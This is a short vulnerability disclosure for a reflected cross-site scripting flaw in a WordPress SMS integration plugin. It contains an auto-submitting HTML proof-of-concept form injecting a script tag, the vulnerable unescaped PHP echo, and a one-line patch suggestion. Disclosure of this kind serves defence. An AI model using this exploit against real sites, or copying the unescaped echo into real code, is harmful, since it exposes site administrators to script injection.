___________________________________________________
|
| Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

Exploit :

<html>
<body onload="document.exploit.submit()">
 <form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/
 cf7-international-sms-integration/includes/admin/class-sms-log-display.php "> 
 <input type="hidden" name="page" value=""/><script>alert(1)</script>" />
 <input type="hidden" name="tab" value="smslogs" />
  
</form>
</body>
</html>

__________________________________________________

Vulnerable method :
 $_GET

Vulnerable File :
 wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php

Vulnerable code:


line 366 :
 <form id="smslog-filter" method="get" action="<?php echo $current_url; ?> "> 
 <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
 <input type="hidden" name="tab" value="smslogs" />
 <?php $testListTable->display() ?> 
</form>
    
     
__________________________________________________

#patch:

For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________

Discovered By : M.R.S.L.Y 
__________________________________________________